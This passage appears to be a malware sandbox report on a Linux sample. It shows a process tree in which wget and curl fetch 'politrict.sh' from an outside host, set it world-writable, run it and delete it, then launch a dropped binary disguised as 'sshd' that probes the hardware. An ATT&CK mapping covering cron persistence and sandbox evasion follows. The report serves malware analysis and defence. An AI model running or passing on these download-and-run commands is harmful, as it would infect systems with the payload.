- - /usr/bin/chmod
    chmod 777 /var/tmp/retrict.sh
    3⤵
    - File and Directory Permissions Modification
    PID:1723
- - /var/tmp/retrict.sh
    ./retrict.sh
    3⤵
    - Executes dropped EXE
    PID:1724
- - /usr/bin/rm
    rm retrict.sh
    3⤵
    PID:1725
- - /usr/bin/wget
    wget -nc http://dash.cloudflare.ovh/mvt/politrict.sh -q -P /var/tmp/
    3⤵
    PID:1726
- - /usr/bin/chmod
    chmod 777 /var/tmp/politrict.sh
    3⤵
    - File and Directory Permissions Modification
    PID:1727
- - /usr/bin/curl
    curl http://dash.cloudflare.ovh/mvt/politrict.sh -s -o /var/tmp/politrict.sh
    3⤵
    PID:1728
- - /usr/bin/chmod
    chmod 777 /var/tmp/politrict.sh
    3⤵
    - File and Directory Permissions Modification
    PID:1730
- - /var/tmp/politrict.sh
    ./politrict.sh
    3⤵
    - Executes dropped EXE
    PID:1731
- - /usr/bin/rm
    rm politrict.sh
    3⤵
    PID:1732
- - /usr/bin/flock
    /usr/bin/flock -n /var/tmp/vm.lock -c "cd /var/tmp; nohup ./sshd >/dev/null 2>&1 &"
    3⤵
    PID:1733
- /usr/bin/rm
  rm -rf loadbit ovlcap seasbit
  2⤵
  PID:1734

/usr/bin/nohup
nohup ./sshd
1⤵
PID:1636

/var/tmp/sshd
./sshd
1⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:1636

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Unix Shell

T1059.004

Scheduled Task/Job

T1053

Cron

Persistence

Scheduled Task/Job

T1053

Cron

Privilege Escalation

Scheduled Task/Job

T1053

Cron

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Virtualization/Sandbox Evasion

T1497

System Checks

Credential Access

Discovery

System Information Discovery

Virtualization/Sandbox Evasion

T1497

System Checks